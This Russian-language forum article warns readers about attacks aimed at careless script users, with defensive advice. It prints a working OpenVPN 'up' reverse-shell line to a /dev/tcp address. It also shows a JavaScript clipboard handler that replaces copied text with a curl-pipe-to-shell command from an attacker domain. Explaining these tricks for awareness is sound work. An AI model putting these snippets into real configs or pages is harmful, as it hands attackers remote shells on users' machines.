• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Скрипт-кидди под ударом

Привет, форумчане! С Новым годом всех!

В конце прошлого года, до того, как наш Казахстан начали громить и изолировали нас от интернета, наткнулся на интереснейший метод "обмана уязвимых слоев хакерского сообщества" - (Script kiddie), о чем попробую сегодня Вам поведать.

script-kiddie.png


— крупнейший веб-сервис для хостинга IT-проектов и их совместной разработки. Создатели сайта называют GitHub «социальной сетью для разработчиков». Кроме размещения кода, участники могут общаться, комментировать правки друг друга, а также следить за новостями знакомых.

Надеюсь все в курсе про то, насколько опасно брать скрипты с github к примеру и запускать их на своих устройствах без предварительного ознакомления.
Если нет, то проясню: после именитого ресурса github.com корпорацией Microsoft - появилось правило, запрещающее располагать на ресурсе скомпилированные образцы - только исходники, с которых пользователи сами собирают исполняемые файлы, в том числе ввелась проверки исходного кода скриптов перед их использованием.

Вот как пример:

MageCart-skimmer-hosted-on-GitHub.png


Не хочу заострять внимание на этом пункте, очень многие злоумышленники, особенно при освещении какого-нибудь свежего CVE стараются подсунуть POC с полезной нагрузкой, и десятки тысяч неосведомленных людей страдают, доверяясь именитому источнику и запускают исполняемые файлы без проверки, о чем полный интернет информации.

В этот раз хочу поведать о еще 2-х интересных методах:
  1. OpenVPN Reverse shell
  2. Copy&Past Injection

1.
В нынешнее время очень многие организации, в том числе публичные, используют free OpenVPN сервисы, как средство обеспечения удаленного доступа, в том числе именитые CTF-площадки как HackTheBox и другие.

В чем же опасность?

Да вот представьте себе, на весеннем марафоне The Standoff 2021, в котором мы по итогу заняли 2-е место - увидели конфиг ovpn, содержащий строки подключения к командному серверу, но в порыве битвы не придали этому значение, посчитав, что указанный в конфиге IP адрес просто принадлежал одной из команд участников. Но затем в перерыве обнаружили команду удаленного доступа при активации конфига и как оказалась, что наш сокомандник слепил такой конфиг и подбросил "пирожок".

Продемонстрирую на примере конфига к HackTheBox:

HTB_reverseShell.jpg


Сама строка в конфиге выглядит следующим образом:
script-security 2 up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”

Самое стремное, что даже после сброса соединения OpenVPN - подключение может быть активным:

HTB_Reverseshell_after.jpg


Ознакомиться с переводом статьи от 2018 года можете в
Единственный метод уберечься - читать внимательно исполняемые конфиги и скрипты.
Ну или запретить все исходящие порты.

2.
Совершенно недавно, буквально накануне НГ я встретил такой метод обмана -
На веб-странице есть статья с некими командами, копируя которые, Вы даже не подозреваете что происходит подстановка символов и при вставке кода в свой терминал Вы невольно реализуете Reverse Shell или RCE до сервера злоумышленника.

С виду обычный текст

1642584412553.png


При вставке в терминал получаем RCE

telegram-cloud-document-2-5420085780787762333.jpg


Теперь поясню, как это работает. Ради эксперимента, разместите на своем локальном веб-сервере js скрипт следующего содержания вместе с любым html содержимым, к примеру:

Java:
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });
</script>

Как мы видим, при копировании элемента текста с текстового поля происходит замена на вызов нашего зловреда с переносом строки, дабы не утруждать нас нажимать клавишу Enter и мы невольно можем стать жертвой.

Скажете Вы - дак это надо совсем олухом быть, чтобы не видеть такого - отвечу - можно все тоже-самое провернуть и с абфускацией исполняемой команды и спрятать это дело в часть скопированного текста, тут все от фантазии зависит.

Вот ролик с демонстрацией

Единственный метод уберечься - вставлять в текстовый редактор или использовать octothorpe или sharp (#) перед вставкой скопированного текста в терминал.
Еще один метод уберечься, в родном терминале последнего Kali - установить значение "Confirm multiple lines" или поискать это значение в используемом Вами терминале

1642590291529.jpeg


Будьте бдительны и внимательны!
 
Последнее редактирование:
02.03.2021
554
399
BIT
252
Спасибо за еще одну паранойю @clevergod
Теперь потребуется не только фильтровать что делаю сам, но и контролировать разработчиков
 
  • Нравится
Реакции: DragonFly

pp11

Green Team
16.09.2018
201
82
BIT
1
Про копипаст команд еще есть софт PasteZort. Только не через JS делает, а через стили
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!